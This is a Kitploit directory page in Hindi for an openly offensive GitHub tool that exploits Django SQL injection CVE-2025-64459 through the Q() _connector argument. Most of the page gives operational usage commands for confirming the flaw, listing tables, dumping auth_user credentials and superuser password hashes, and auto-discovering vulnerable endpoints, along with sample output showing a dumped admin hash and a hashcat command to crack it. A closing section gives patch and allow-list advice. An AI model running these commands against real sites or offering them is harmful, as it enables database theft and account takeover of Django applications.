Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RedTeamBrasil-CVE-2025-64459 — NEO-SQLi — Django _connector SQL Injection (CVE-2025-64459) का शोषण | RedTeam Brasil चैनल | Kitploit
उपकरण/GitHubGitHub/rafaelchriss/redteambrasil-cve-2025-64459
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubrafaelchriss/redteambrasil-cve-2025-64459

RedTeamBrasil-CVE-2025-64459

NEO-SQLi — Django _connector SQL Injection (CVE-2025-64459) का शोषण | RedTeam Brasil चैनल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

connector-sqli

Django के ORM में SQL Injection का स्वचालित शोषण
Q-object _connector · CVE-2025-64459

cve django python license

🎥 RedTeam Brasil चैनल — आक्रामक सुरक्षा, व्यवहार में, पुर्तगाली में।

root@kitploit:~
   ██████╗ ████████╗██████╗    connector-sqli
   ██╔══██╗╚══██╔══╝██╔══██╗   Django Q() `_connector` SQLi
   ██████╔╝   ██║   ██████╔╝   CVE-2025-64459
   ██╔══██╗   ██║   ██╔══██╗   canal RedTeam Brasil
   ██║  ██║   ██║   ██████╔╝   youtube.com/@RedTeamBrasil
   ╚═╝  ╚═╝   ╚═╝   ╚═════╝    uso autorizado apenas

📌 भेद्यता के बारे में — CVE-2025-64459

Django का ORM Q() ऑब्जेक्ट्स के साथ फ़िल्टर बनाता है। कंस्ट्रक्टर Q(*args, _connector=None, _negated=False, **kwargs) विशेष kwarg _connector स्वीकार करता है — वह स्ट्रिंग (AND/OR) जो WHERE के अंदर की शर्तों को जोड़ती है।

प्रभावित संस्करणों में यह मान सैनिटाइज़ नहीं किया जाता था और कच्चा SQL में चला जाता था। जब एप्लिकेशन डिक्शनरी विस्तार के माध्यम से उपयोगकर्ता इनपुट को सीधे Q() / .filter() / .exclude() / .get() में भेजता है — क्लासिक एंटी-पैटर्न:

root@kitploit:~
# ❌ VULNERÁVEL
posts = Post.objects.filter(Q(**request.GET))     # ou .filter(**request.GET)

…हमलावर _connector को नियंत्रित करता है और शर्तों के बीच मनमाना SQL इंजेक्ट करता है (SQLite, PostgreSQL, MySQL, आदि पर लागू होता है)।

जब DEBUG = True होता है तो शोषण तुच्छ हो जाता है: Django का एरर पेज निर्मित SQL, बेस टेबल और कॉलमों की संख्या लौटाता है — बिल्कुल वही जो टूल UNION को अकेले बनाने के लिए उपयोग करता है।


⚡ विशेषताएँ

सामान्य (किसी एक लक्ष्य से बंधा नहीं) और स्वचालित एक्सप्लॉइटर:

  • 🧭 एंडपॉइंट खुद ढूँढता है (--auto): होम पर क्रॉल + robots/sitemap + अंतर्निहित wordlist, Django के FieldError द्वारा हर रूट का परीक्षण करते हुए।
  • 🔎 FieldError के माध्यम से भेद्य एंडपॉइंट और DEBUG=True का पता लगाता है।
  • 🧠 एरर पेज की SQL पढ़कर बेस टेबल और कॉलमों की संख्या स्वतः खोजता है।
  • 🎯 मार्करों के साथ प्रतिबिंबित कॉलम ढूँढता है → डिलिमिटर द्वारा निष्कर्षण (पेज कैसे रेंडर करता है, इससे स्वतंत्र)।
  • 🗃️ टेबल सूचीबद्ध करता है → कॉलम सूचीबद्ध करता है → किसी भी टेबल का डंप करता है (UNION-आधारित)।
  • 🐚 इंटरैक्टिव मोड (मेनू: टेबल → कॉलम → डंप)।
  • 🧪 प्रॉक्सी (--proxy के माध्यम से Burp/mitmproxy) और HTTPS लक्ष्य।

🚀 स्थापना

root@kitploit:~
git clone https://github.com/rafaelchriss/RedTeamBrasil-CVE-2025-64459.git
cd RedTeamBrasil-CVE-2025-64459
pip install -r requirements.txt
chmod +x rtb_connector_sqli.py

🎮 उपयोग

root@kitploit:~
# 1) confirmar a falha
python3 rtb_connector_sqli.py -u http://ALVO check

# 2) listar tabelas
python3 rtb_connector_sqli.py -u http://ALVO tables

# 3) listar colunas de uma tabela
python3 rtb_connector_sqli.py -u http://ALVO columns auth_user

# 4) dumpar (colunas específicas ou todas)
python3 rtb_connector_sqli.py -u http://ALVO dump auth_user --cols username,password,is_superuser
python3 rtb_connector_sqli.py -u http://ALVO dump auth_user --where "is_superuser=1"

# 5) atalho pros usuários do Django
python3 rtb_connector_sqli.py -u http://ALVO users

# 6) expressão SQL livre
python3 rtb_connector_sqli.py -u http://ALVO query "sqlite_version()"

# 7) MODO INTERATIVO (menu tabela → colunas → dump)
python3 rtb_connector_sqli.py -u http://ALVO shell

# 8) NÃO SABE A ROTA? deixa ele achar sozinho
python3 rtb_connector_sqli.py -u http://ALVO auto              # só descobre e lista
python3 rtb_connector_sqli.py -u http://ALVO --auto shell      # descobre e já explora

--auto (या auto उपकमांड) के साथ यह होम + robots.txt/sitemap.xml पर क्रॉल करता है और लिस्टिंग/खोज रूट्स (EN + PT-BR + APIs) की एक अंतर्निहित wordlist चलाता है, उन्हें चिह्नित करते हुए जो Django का FieldError लौटाती हैं। यदि आप कोई गलत --path देते हैं, तो यह स्वचालित रूप से डिस्कवरी मोड में चला जाता है।

विकल्प

root@kitploit:~
# tudo pelo Burp
python3 rtb_connector_sqli.py -u http://ALVO --proxy http://127.0.0.1:8080 users

# ou por variável de ambiente (sem a flag)
export HTTP_PROXY=http://127.0.0.1:8080 HTTPS_PROXY=http://127.0.0.1:8080
python3 rtb_connector_sqli.py -u http://ALVO shell

🖥️ आउटपुट उदाहरण

root@kitploit:~
[*] Alvo: http://ALVO/list
[+] Campos do model (6): author, content, created_at, id, status, title
[+] SQLi confirmada no `_connector` (CVE-2025-64459). near "'RTB'": syntax error
[+] Tabela base: <app>_<model>   ·   colunas no SELECT: 6
[+] Coluna refletida (leitura): posição 4
┌── auth_user (N)
│ admin | pbkdf2_sha256$600000$<salt>$<hash>= | is_superuser=1 | admin@target
└──

सुपरयूज़र का हैश हाथ में होने पर:

root@kitploit:~
hashcat -m 10000 hash.txt rockyou.txt      # Django usa pbkdf2_sha256

🛡️ उपचार

  1. Django को 4.2.26 / 5.1.14 / 5.2.8+ में अपडेट करें।
  2. request.GET को सीधे Q()/.filter() में कभी न भेजें। allow-list का उपयोग करें:
    root@kitploit:~
    ALLOWED = {"title__icontains", "status"}
    safe = {k: v for k, v in request.GET.items() if k in ALLOWED}
    Post.objects.filter(**safe)
    
  3. प्रोडक्शन में DEBUG = False रखें (SQL/टेबल/settings लीक न हों)।
  4. डेटाबेस उपयोगकर्ता न्यूनतम विशेषाधिकार के साथ।

⚖️ कानूनी अस्वीकरण

टूल केवल शैक्षिक और अधिकृत परीक्षणों के लिए है (लैब्स, CTFs, स्कोप में bug bounty, अनुबंधित pentest)। स्पष्ट प्राधिकरण के बिना सिस्टम के विरुद्ध उपयोग अपराध है — आप ही एकमात्र ज़िम्मेदार हैं।


RedTeam Brasil द्वारा निर्मित · पसंद आया? लाइक करें और चैनल सब्सक्राइब करें।

टूल डाउनलोड करें
आइटमविवरण
CVECVE-2025-64459
घटकdjango.db.models — Q() / QuerySet (_connector और कॉलम उपनाम)
प्रभावित संस्करणDjango < 4.2.26, < 5.1.14, < 5.2.8
सुधार4.2.26 / 5.1.14 / 5.2.8 (या उच्चतर) में अपडेट करें
प्रभावडेटाबेस से मनमाना पठन (UNION/blind) → क्रेडेंशियल डंप और श्रृंखला एस्केलेशन
फ़्लैगकिसके लिए
--path /buscarभेद्य एंडपॉइंट (डिफ़ॉल्ट /list)
--autoएंडपॉइंट खुद ढूँढता है (क्रॉल + wordlist)
--wordlist rotas.txtडिस्कवरी के लिए अतिरिक्त रूट्स (1 प्रति पंक्ति)
--base app_modelबेस टेबल को मजबूर करता है (यदि ऑटो-डिटेक्शन विफल हो)
--proxy http://127.0.0.1:8080सब कुछ Burp / mitmproxy को भेजता है